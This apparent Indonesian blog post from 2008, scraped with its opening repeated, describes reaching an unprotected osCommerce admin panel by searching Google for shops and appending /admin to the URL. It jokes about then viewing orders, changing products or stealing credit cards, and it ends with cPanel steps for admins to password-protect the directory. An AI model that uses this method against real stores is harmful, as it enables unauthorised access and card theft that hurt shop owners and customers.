maka akan muncul gambar seperti dibawah ini:
nah labas…LEMPENG AJA MASUK TANPA PASSWORD… wah kalo gini kita bisa melihat data2 pembelian … ato mengganti nama produk … atau mencuri kartu kredit … enak kan ….
PENANGANAN UNTUK ADMIN
Untuk menangani hal tersebut lakukan langkah di bawah ini:
1. Masuk ke hosting maksudnya ke controp panel….tau kan maksudnya, misalnya websitenya www.korban.com maka untuk membuka kontrol panel nyah www.korban.com/cpanel terus isi passwordnyah…maka akan muncul gambar di bawah ini:
2. Kemudian klik “Password Protect Directories”, maka akan muncul gambar seperti di bawah ini:
3. Nah pilih direktori admin biasanya terletak di direktori:
public_html/direktoriwebsitekita/admin
Naaa…. setelah itu akan muncul gambar seperti di bawah ini:
4. Kemudian beri tanda di tulisan “Directiry requires the password to access via the web dan klik save.
5. Sekarang coba buka halaman admin, maka akan muncul kotak password seperti di bawah ini:
Nah selesai kan… semoga dapat membantu para admin yang memakai CMS OSCOMMERCE … ok…
Filed Under (All, Hacking, tips & trick) by Ph4][)HL1 R4Ph1Q1 on 28-04-2008
Tagged Under : All, Brankas, Content Management System, Controp, Cracking, Data2, Enak, Gampang, Gini, Gitu, Goolge, Hacking, Halaman, Kalo, Kartu Kredit, keamanan, Korban, Labas, Liat, Maka, Ngeri, Password Protect Directories, Tutorial, Udah
kali ini kita akan membahas bagaimana cara meng-hacking CMS OSCOMMERCE …. nah apa itu CMS OSCOMMERCE????…kita liat dulu yang satu ini :
CMS OSCOMMERCE
CMS OSCOMMERCE adalah suatu content management system yang dibuat untuk mem-build atau membuat web page toko online secara otomatis,..nah disini OSCOMMERCE ada kelemahannya…yaitu kita tidak bisa memberi password di halaman admin. Padahal sangat riskan sekali jika halaman admin tidak dapat diberi password. Sama saja membiarkan terbuka brankas kita di bank tanpa penjagaan polisi atau pihak keamanan bank. Ngeri kan … otomatis bisa di obrak abrik website kita…mau gitu kalo website yang udah capek2 dibuat diobrak abrik?????gak mau kan …
HACKING OSCOMMERCE
nah untuk masuk ke halaman admin gampang sekali, tinggal cari di goolge siapa aja yang memakai CMS OSCOMMERCE, kemudian ketik url di bawah ini, misalnya site yang akan kita jebol adalah www.korban.com/korban, maka kita menuliskannya di URL adalah:
www.korban.com/korban/admin
maka akan muncul gambar seperti dibawah ini:
nah labas…LEMPENG AJA MASUK TANPA PASSWORD… wah kalo gini kita bisa melihat data2 pembelian … ato mengganti nama produk … atau mencuri kartu kredit … enak kan ….
PENANGANAN UNTUK ADMIN
Untuk menangani hal tersebut lakukan langkah di bawah ini:
1. Masuk ke hosting maksudnya ke controp panel….tau kan maksudnya, misalnya websitenya www.korban.com maka untuk membuka kontrol panel nyah www.korban.com/cpanel terus isi passwordnyah…maka akan muncul gambar di bawah ini:
2. Kemudian klik “Password Protect Directories”, maka akan muncul gambar seperti di bawah ini:
3. Nah pilih direktori admin biasanya terletak di direktori:
public_html/direktoriwebsitekita/admin
Naaa…. setelah itu akan muncul gambar seperti di bawah ini:
4. Kemudian beri tanda di tulisan “Directiry requires the password to access via the web dan klik save.
5. Sekarang coba buka halaman admin, maka akan muncul kotak password seperti di bawah ini:
Nah selesai kan… semoga dapat membantu para admin yang memakai CMS OSCOMMERCE … ok…
Langganan:
Postingan (Atom)
